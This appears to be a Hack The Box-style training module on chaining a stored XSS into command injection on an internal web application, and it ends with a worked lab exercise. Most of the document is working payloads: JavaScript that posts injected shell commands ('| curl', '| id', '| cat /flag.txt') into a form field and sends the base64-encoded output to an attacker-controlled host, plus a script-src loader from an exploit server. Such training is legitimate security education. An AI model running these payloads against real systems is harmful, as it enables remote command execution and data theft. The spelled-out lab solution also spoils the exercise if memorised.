# Exploiting Internal Web Apps II

After discussing how to exploit a SQL injection vulnerability in an internal web application through an XSS vulnerability, this section explores how to exploit a command injection vulnerability through XSS. While the methodology is the same, it is worth understanding it well: the process is involved but powerful, and a thorough grasp of it helps when identifying complex real-world vulnerabilities.

## Identifying the Vulnerability

The identification process is essentially identical to the one discussed in the previous section. We will use the same base XSS payload, and the admin endpoint contains a reference to another internal web application at `https://internal.internal-webapps-2.htb`. We can use the following payload to exfiltrate the index page of the internal web application:

```js
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://internal.internal-webapps-2.htb/', false);
xhr.send();

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

This reveals the following HTML content, which indicates that we can use the web application to check the status of different web applications:

`HTML form to select a web application with radio buttons for different URLs and a submit button labeled 'Check.'`

We can craft the corresponding POST request by analyzing the form to identify how exactly the web application implements this functionality:

```js
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("https://internal-webapps-2.htb")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

This results in the following response:

`HTTP/1.1 200 OK`

Let us try a non-existing domain to see if we can provoke an error message:

```js
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("https://doesnotexist.htb")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

This results in the following response:

`curl: (6) Could not resolve host: doesnotexist.htb`

As we can see, the status seems to be obtained using curl. If the URL is passed to curl through a shell without proper sanitization, there is a potential command injection vulnerability. We can verify this by injecting an additional curl command that calls back to the exfiltration server:

```js
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| curl -k https://10.10.14.144:4443?pwn")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

Afterward, we can see the expected request in the exfiltration server, thus confirming the command injection vulnerability:

```bash
kabaneridev@htb[/htb]$ python3 server.py

10.129.233.62 - - [01/Jan/2025 15:10:56] "GET /?pwn HTTP/1.1" 200 -
10.129.233.62 - - [01/Jan/2025 15:10:56] code 404, message File not found
10.129.233.62 - - [01/Jan/2025 15:10:56] "GET /exfil?r=[base64-encoded response] HTTP/1.1" 404 -
```

## Exploiting the Vulnerability

We can place the command injection payload inside our XSS payload and exfiltrate the result to the exfiltration server. Exploitation thus does not differ from that of any other command injection vulnerability. For instance, we can execute the `id` command:

```js
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| id")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

Decoding the base64-encoded response reveals the command output:

```bash
uid=0(root) gid=0(root) groups=0(root)
```

## Exploiting Internal Web Applications II Questions

**Question 1: Exploit the XSS vulnerability to target the internal web application and obtain the flag.**

1. Add the necessary vHosts to your `/etc/hosts` file:

   ```bash
   sudo sh -c 'echo "10.129.233.62 exploitserver.htb internal-webapps-2.htb" >> /etc/hosts'
   ```
2. Log in to the vulnerable site (`https://internal-webapps-2.htb`) using the credentials `htb-stdnt:...!`.
3. Submit your base XSS payload as a guestbook entry:

   ```html
   <script src="https://exploitserver.htb/exploit"></script>
   ```
4. Prepare a payload on the exploit server (`https://exploitserver.htb`) that exploits the command injection vulnerability on the internal site identified in the section's reading. The payload must execute the command `cat /flag.txt` and send the output to the exfiltration server:

   ```js
   var xhr = new XMLHttpRequest();
   var params = `webapp_selector=${encodeURIComponent("| cat /flag.txt")}`;
   xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
   xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
   xhr.send(params);

   var exfil = new XMLHttpRequest();
   exfil.open("GET", "https://PWNIP:PWNPO/exfil?r=" + btoa(xhr.responseText), false);
   exfil.send();
   ```
5. After the victim triggers the payload, decode the Base64-encoded blob to reveal the flag.

